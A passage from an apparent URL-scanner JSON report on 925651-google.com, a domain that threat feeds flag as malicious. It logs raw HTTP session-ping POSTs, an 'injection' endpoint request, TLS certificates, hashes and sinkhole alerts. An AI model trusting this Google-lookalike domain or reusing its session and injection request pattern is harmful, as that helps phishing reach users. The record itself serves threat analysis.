data","md5":"a825755e878073675a2be8cb3e5dd4ee","sha1":"2c34e9b17a4cfbbe6702e542ee7d5b74dd3752bc","sha256":"941d6623d85f364ca5cd02966c47a7e0b5d246ed67d1ec14bd3df90f2abe256c","sha512":"4bdd87c22ba777cae8b068da21b240d123ff665ce155941fc4d5f8dd014ae11da590b2c01e5d37e9c3816a6eb3c2754b5499dce9ac55cbc78f9b3f199c0f045d","ssdeep":"","tlshash":"56a00244d43c217924c49746156c2661ea9e9d7c71b7108149ed59240b109c6c6aca38","first_seen":"2026-04-21T09:03:25.850558Z","last_seen":"2026-04-21T09:03:25.850558Z","times_seen":1,"resource_available":false,"data":null}},"time_used":79,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":79,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/public/session/ping","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:03:07.571Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"POST /api/public/session/ping HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: application/json\r\nContent-Length: 231\r\nOrigin: https://925651-google.com\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"POST","post_data":{"size":231,"data":"{\"id\":\"2971296c-6950-44d8-96a4-527bbcd2f099\",\"input\":{},\"page\":\"/\",\"domain\":\"925651-google.com\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\",\"_bs\":0,\"_ic\":0,\"_vs\":\"active\",\"_lf\":{}}"}},"response":{"raw":"HTTP/3 200 OK\r\nx-xss-protection: 1; mode=block\r\ncontent-encoding: br\r\ndate: Tue, 21 Apr 2026 09:03:07 GMT\r\ncontent-type: application/json; charset=utf-8\r\npriority: u=4,i=?0\r\ncf-ray: 9efb36b858790883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"42-LDTpsXpM+75nAuVC7n1bdN03Urw\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=Sm0Nx82%2BdSCH03vvx9cFz3yM51PIws9U0xWzd5%2Bi%2BOp%2BPaVABxZ2pQxkqYGQuLedZ9uwQHpCc6xGdeB7MpUAPb51QnyHo%2BH70tyrPF9p4rFBWtjZqKDjtS04pbkD4S5jP1SUKyaD8SqXfYGXs7HPfj8%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":66,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"a825755e878073675a2be8cb3e5dd4ee","sha1":"2c34e9b17a4cfbbe6702e542ee7d5b74dd3752bc","sha256":"941d6623d85f364ca5cd02966c47a7e0b5d246ed67d1ec14bd3df90f2abe256c","sha512":"4bdd87c22ba777cae8b068da21b240d123ff665ce155941fc4d5f8dd014ae11da590b2c01e5d37e9c3816a6eb3c2754b5499dce9ac55cbc78f9b3f199c0f045d","ssdeep":"","tlshash":"56a00244d43c217924c49746156c2661ea9e9d7c71b7108149ed59240b109c6c6aca38","first_seen":"2026-04-21T09:03:25.850558Z","last_seen":"2026-04-21T09:03:25.850558Z","times_seen":1,"resource_available":false,"data":null}},"time_used":85,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":85,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/public/session/ping","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:03:09.575Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"POST /api/public/session/ping HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: application/json\r\nContent-Length: 231\r\nOrigin: https://925651-google.com\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"POST","post_data":{"size":231,"data":"{\"id\":\"2971296c-6950-44d8-96a4-527bbcd2f099\",\"input\":{},\"page\":\"/\",\"domain\":\"925651-google.com\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\",\"_bs\":0,\"_ic\":0,\"_vs\":\"active\",\"_lf\":{}}"}},"response":{"raw":"HTTP/3 200 OK\r\nx-xss-protection: 1; mode=block\r\ncontent-encoding: br\r\ndate: Tue, 21 Apr 2026 09:03:09 GMT\r\ncontent-type: application/json; charset=utf-8\r\npriority: u=4,i=?0\r\ncf-ray: 9efb36c4da380883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"42-LDTpsXpM+75nAuVC7n1bdN03Urw\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=zInJcFAwFO663BMLOjDMHDOypDpDxt9LxEAdBMy7%2BGDlGQXfXunuU788BWUuUGiInlHf6RQ0Uze%2FM0Jmf9vL1WtNVt0bbzdyUkLu1r5dcH4F%2BfLMqjR6IITFLwdYRQ64fseLjjwrJwdG7fesm73eXRo%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":66,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"a825755e878073675a2be8cb3e5dd4ee","sha1":"2c34e9b17a4cfbbe6702e542ee7d5b74dd3752bc","sha256":"941d6623d85f364ca5cd02966c47a7e0b5d246ed67d1ec14bd3df90f2abe256c","sha512":"4bdd87c22ba777cae8b068da21b240d123ff665ce155941fc4d5f8dd014ae11da590b2c01e5d37e9c3816a6eb3c2754b5499dce9ac55cbc78f9b3f199c0f045d","ssdeep":"","tlshash":"56a00244d43c217924c49746156c2661ea9e9d7c71b7108149ed59240b109c6c6aca38","first_seen":"2026-04-21T09:03:25.850558Z","last_seen":"2026-04-21T09:03:25.850558Z","times_seen":1,"resource_available":false,"data":null}},"time_used":80,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":80,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/public/session/ping","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:03:11.573Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"POST /api/public/session/ping HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: application/json\r\nContent-Length: 231\r\nOrigin: https://925651-google.com\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"POST","post_data":{"size":231,"data":"{\"id\":\"2971296c-6950-44d8-96a4-527bbcd2f099\",\"input\":{},\"page\":\"/\",\"domain\":\"925651-google.com\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\",\"_bs\":0,\"_ic\":0,\"_vs\":\"active\",\"_lf\":{}}"}},"response":{"raw":"HTTP/3 200 OK\r\nx-xss-protection: 1; mode=block\r\ncontent-encoding: br\r\ndate: Tue, 21 Apr 2026 09:03:11 GMT\r\ncontent-type: application/json; charset=utf-8\r\npriority: u=4,i=?0\r\ncf-ray: 9efb36d15bea0883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"42-LDTpsXpM+75nAuVC7n1bdN03Urw\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=vxGSu%2FBC2oU2xnPa6Wsrdt4I7PITTXKr50KwTW4NyecBUuWPyPWLiC0EiraoF6c4j%2BH%2BB2vHe0V43KFcXtM1SSGI8IC1XEKG27MTCH3qJhguSRT%2BU%2FmdZp5g2Rjcz2nBxfG5t24bzqMe4h0SCo0lYeo%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":66,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"a825755e878073675a2be8cb3e5dd4ee","sha1":"2c34e9b17a4cfbbe6702e542ee7d5b74dd3752bc","sha256":"941d6623d85f364ca5cd02966c47a7e0b5d246ed67d1ec14bd3df90f2abe256c","sha512":"4bdd87c22ba777cae8b068da21b240d123ff665ce155941fc4d5f8dd014ae11da590b2c01e5d37e9c3816a6eb3c2754b5499dce9ac55cbc78f9b3f199c0f045d","ssdeep":"","tlshash":"56a00244d43c217924c49746156c2661ea9e9d7c71b7108149ed59240b109c6c6aca38","first_seen":"2026-04-21T09:03:25.850558Z","last_seen":"2026-04-21T09:03:25.850558Z","times_seen":1,"resource_available":false,"data":null}},"time_used":82,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":81,"receive":1,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null},{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/sessions/2971296c-6950-44d8-96a4-527bbcd2f099/injection","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:03:12.572Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"GET /api/sessions/2971296c-6950-44d8-96a4-527bbcd2f099/injection HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 403 Forbidden\r\ncontent-length: 28\r\npriority: u=4,i=?0\r\ndate: Tue, 21 Apr 2026 09:03:12 GMT\r\ncontent-type: application/json; charset=utf-8\r\nx-xss-protection: 1; mode=block\r\ncf-ray: 9efb36d79cd40883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"1c-nWcT8lAoCqDjrCJITDHkT+rfixY\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=LIZFSR3cQZb%2BtZqfm3ysWRBMoe4mjR87qC88AqBo60pxraKaStka9G6JH6Lcth6quXBAJrHfm%2Fhn50QKMBMfXz0ggBhvnKqsXMheMjCa6NQ9%2F2ftpFvw61QGeQpRVYYtyJ8SyAfPLeuYIb2M4izdOTo%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"403","status_text":"Forbidden","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":28,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"e3d57c361b5914c7a00f9b354d2cdf0f","sha1":"9d6713f250280aa0e3ac22484c31e44feadf8b16","sha256":"549a258bb3491836ef45f626a5508bd53857b9bf3212ebe35effa0839b0c07cb","sha512":"d77130401d4387a0886a3ad1b76cb8bae9fdf861807690ac4842845e8395ebc631d00373d3db728282cd3bb7ebe4e4f66a1c3fb92e6bb4e86778338596781543","ssdeep":"","tlshash":"bb80002fb8082e0803230003302020e2280000800b8823c3088a3008030c8028202200","first_seen":"2026-04-21T09:03:25.847616Z","last_seen":"2026-04-21T09:16:26.526865Z","times_seen":2,"resource_available":false,"data":null}},"time_used":106,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":105,"receive":1,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null},{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/public/session/ping","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:03:13.572Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"POST /api/public/session/ping HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: application/json\r\nContent-Length: 231\r\nOrigin: https://925651-google.com\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"POST","post_data":{"size":231,"data":"{\"id\":\"2971296c-6950-44d8-96a4-527bbcd2f099\",\"input\":{},\"page\":\"/\",\"domain\":\"925651-google.com\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\",\"_bs\":0,\"_ic\":0,\"_vs\":\"active\",\"_lf\":{}}"}},"response":{"raw":"HTTP/3 200 OK\r\nx-xss-protection: 1; mode=block\r\ncontent-encoding: br\r\ndate: Tue, 21 Apr 2026 09:03:13 GMT\r\ncontent-type: application/json; charset=utf-8\r\npriority: u=4,i=?0\r\ncf-ray: 9efb36ddddb90883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"42-LDTpsXpM+75nAuVC7n1bdN03Urw\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=IPYlgZAcA21kHUHpzZ07Up8xtbKkQM6j1IXaWOH%2BL1AcmXOv2NWvGqunOGaJrqyaBTXoeKhWd3yRvwlA8Y1O3K%2FYOb2aLO0%2FdGubXgH4K1DNUtrx34YztoXLXbihaQ91f9KfxDdubaYW6UQ4UEdpP%2Bc%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":66,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"a825755e878073675a2be8cb3e5dd4ee","sha1":"2c34e9b17a4cfbbe6702e542ee7d5b74dd3752bc","sha256":"941d6623d85f364ca5cd02966c47a7e0b5d246ed67d1ec14bd3df90f2abe256c","sha512":"4bdd87c22ba777cae8b068da21b240d123ff665ce155941fc4d5f8dd014ae11da590b2c01e5d37e9c3816a6eb3c2754b5499dce9ac55cbc78f9b3f199c0f045d","ssdeep":"","tlshash":"56a00244d43c217924c49746156c2661ea9e9d7c71b7108149ed59240b109c6c6aca38","first_seen":"2026-04-21T09:03:25.850558Z","last_seen":"2026-04-21T09:03:25.850558Z","times_seen":1,"resource_available":false,"data":null}},"time_used":85,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":84,"receive":1,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/public/session/ping","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:03:15.579Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"POST /api/public/session/ping HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: application/json\r\nContent-Length: 231\r\nOrigin: https://925651-google.com\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"POST","post_data":{"size":231,"data":"{\"id\":\"2971296c-6950-44d8-96a4-527bbcd2f099\",\"input\":{},\"page\":\"/\",\"domain\":\"925651-google.com\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\",\"_bs\":0,\"_ic\":0,\"_vs\":\"active\",\"_lf\":{}}"}},"response":{"raw":"HTTP/3 200 OK\r\nx-xss-protection: 1; mode=block\r\ncontent-encoding: br\r\ndate: Tue, 21 Apr 2026 09:03:15 GMT\r\ncontent-type: application/json; charset=utf-8\r\npriority: u=4,i=?0\r\ncf-ray: 9efb36ea5fbd0883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"42-LDTpsXpM+75nAuVC7n1bdN03Urw\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: 